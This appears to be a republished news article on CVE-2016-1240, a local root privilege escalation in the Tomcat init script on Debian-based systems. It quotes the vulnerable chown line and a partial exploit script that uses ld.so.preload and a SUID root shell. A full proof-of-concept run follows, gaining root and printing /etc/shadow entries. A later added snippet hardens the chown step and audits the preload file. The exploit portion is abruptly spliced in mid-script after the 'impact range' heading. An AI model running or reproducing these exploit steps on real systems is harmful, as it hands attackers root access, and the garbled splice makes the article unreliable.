
The latest local privilege escalation vulnerability in Tomcat

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Vulnerability principle

When Tomcat is installed with apt-get on a Debian system, the package automatically creates a startup script. The script is located at /etc/init.d/tomcat*. The code is:

    171 # Run the catalina.sh script as a daemon
    172 set +e
    173 touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
    174 chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
    175 start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" \
    176     -c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" \
    177     -x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"
    178 status="$?"
    179 set +a -e

The problem occurs on line 174. When the Tomcat service is restarted, the owner of the log file catalina.out is changed to the Tomcat user, and the startup script is usually called by the root user. If catalina.out is replaced with a link to an arbitrary file, the user can read any system file with high permissions.

Vulnerability impact range

Tomcat 8

    /etc/ld.so.preload
    echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
    echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
    echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

    # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
    echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
    sudo --help 2>/dev/null >/dev/null

    # Check for the rootshell
    ls -l $BACKDOORPATH | grep rws | grep -q root
    if [ $? -eq 0 ]; then
        echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
        echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m"
    else
        echo -e "\n[!] Failed to get root"
        cleanexit 2
    fi

    # Execute the rootshell
    echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
    $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
    $BACKDOORPATH -p

    # Job done.
    cleanexit 0

PoC running instance

    tomcat7@ubuntu:/tmp$ id
    uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

    tomcat7@ubuntu:/tmp$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 16.04 LTS
    Release:        16.04
    Codename:       xenial

    tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
    ii  libtomcat7-java  7.0.68-1ubuntu0.1  all  Servlet and JSP engine -- core libraries
    ii  tomcat7          7.0.68-1ubuntu0.1  all  Servlet and JSP engine
    ii  tomcat7-common   7.0.68-1ubuntu0.1  all  Servlet and JSP engine -- common files

    tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out

    Tomcat 6-7-8 on Debian-based distros - Local Root Privilege Escalation Exploit
    CVE-2016-1240

    Discovered and coded by:
    Dawid Golunski
    http://legalhackers.com

    [+] Starting the exploit in [active] mode with the following privileges:
    uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

    [+] Target Tomcat log file set to /var/log/tomcat7/catalina.out

    [+] Compiling the privesc shared library (/tmp/privesclib.c)

    [+] Backdoor/low-priv shell installed at:
    -rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh

    [+] Symlink Created at:
    lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload

    [+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
    You could speed things up by executing: kill [Tomcat-pid] (as tomcat user) if needed ;)

    [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
    -rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload

    [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

    [+] The /etc/ld.so.preload file now contains:
    /tmp/privesclib.so

    [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!

    [+] Rootshell got assigned root SUID perms at:
    -rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh

    Please tell me you're seeing this too ;)

    [+] Executing the rootshell /tmp/tomcatrootsh now!

    tomcatrootsh-4.3# id
    uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
    tomcatrootsh-4.3# whoami
    root
    tomcatrootsh-4.3# head -n3 /etc/shadow
    root:$6$Oaf[cut]:16912:0:99999:7:::
    daemon:*:16912:0:99999:7:::
    bin:*:16912:0:99999:7:::
    tomcatrootsh-4.3# exit
    exit
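
One way to guard the touch/chown step on lines 173-174 of the startup script, and to check for the /etc/ld.so.preload artifact seen in the run above, as an added example that is not from the original article or the Debian package. The function names prepare_log and audit_preload are hypothetical, and GNU stat is assumed.

```shell
#!/bin/sh
# Added example, not the Debian init script. Function names are hypothetical.
# Assumes GNU coreutils (stat -c), as on the Debian/Ubuntu systems discussed.

# prepare_log OWNER FILE
# Guarded form of the touch/chown pair on lines 173-174: creates FILE if it is
# missing and gives it to OWNER, but refuses to act through any kind of link.
prepare_log() {
    owner=$1
    file=$2
    if [ -L "$file" ]; then
        echo "refusing: $file is a symlink to $(readlink "$file")" >&2
        return 1
    fi
    if [ ! -e "$file" ]; then
        # noclobber (set -C) creates with O_EXCL, so a link planted after the
        # test above makes the creation fail instead of being followed.
        ( set -C; : > "$file" ) 2>/dev/null || return 1
    fi
    if [ ! -f "$file" ] || [ "$(stat -c %h "$file")" -ne 1 ]; then
        echo "refusing: $file is not a single-link regular file" >&2
        return 1
    fi
    # -h changes the path itself and never dereferences a symlink.
    chown -h "$owner" "$file"
}

# audit_preload [FILE]
# The run above ends with /etc/ld.so.preload owned by tomcat7. If the file
# exists and is not owned by uid 0, report it together with its contents.
audit_preload() {
    preload=${1:-/etc/ld.so.preload}
    [ -e "$preload" ] || return 0
    uid=$(stat -c %u "$preload")
    if [ "$uid" -ne 0 ]; then
        echo "FINDING: $preload is owned by uid $uid: $(cat "$preload")"
        return 1
    fi
    return 0
}
```

A check-then-act guard still leaves a small window inside a directory the service user can write to; creating the log file as the service user instead of root removes the privileged chown altogether.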
